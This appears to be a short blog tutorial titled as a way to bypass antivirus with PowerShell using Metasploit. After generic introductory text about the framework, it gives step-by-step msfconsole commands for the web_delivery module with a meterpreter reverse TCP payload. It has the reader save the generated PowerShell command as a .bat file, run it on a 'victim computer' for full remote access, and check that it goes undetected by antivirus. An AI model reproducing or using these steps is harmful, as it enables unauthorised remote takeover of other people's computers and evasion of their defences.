Metasploit Attack Bypass Antivirus using Powershell


Introduction to Metasploit


The Metasploit Framework (MSF) is far more than just a collection of exploits. It’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel. I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment.
This course has been written in a manner to encompass not just the front end “user” aspects of the framework, but rather give you an introduction to the capabilities that Metasploit provides. We aim to give you an in depth look into the many features of the MSF, and provide you with the skill and confidence to utilize this amazing tool to its utmost capabilities.
We will attempt to keep this course up to date with all new and exciting Metasploit features as they are added.

And now I will share a tutorial abaout Metasploit Attack Bypass Antivirus using Powershell
  • Open terminal and type msfconsole
  • > use exploit/multi/script/web_delivery
  • for choose modul on metasploit 
  • > show options 
  • for show selection on modul metasploit 
  • > set URIPATH /
  • > show targets
  • > set target 2
  • for choose PSH


  • > set payload windows/meterpreter/reverse_tcp
  • >  show options
  • > set lhost 10.10.40.11
  • set lhost with your local ip
  • > set lport 888
  • set lport for connect victim dan your computer
  • > exploit
  • Copy powershell.exe

  • Open leafpad and paste.you can save it with format .bat
  • Next, run file .bat on victim computer
  • meterpreter session opened
  • > sessions -i 1 
  • for choose meterpreter session
  • finish. you have full access on victim computer.
you can check file .bat on https://www.metadefender.com/ for check fud all atvirus.

0 Response to "Metasploit Attack Bypass Antivirus using Powershell"

Post a Comment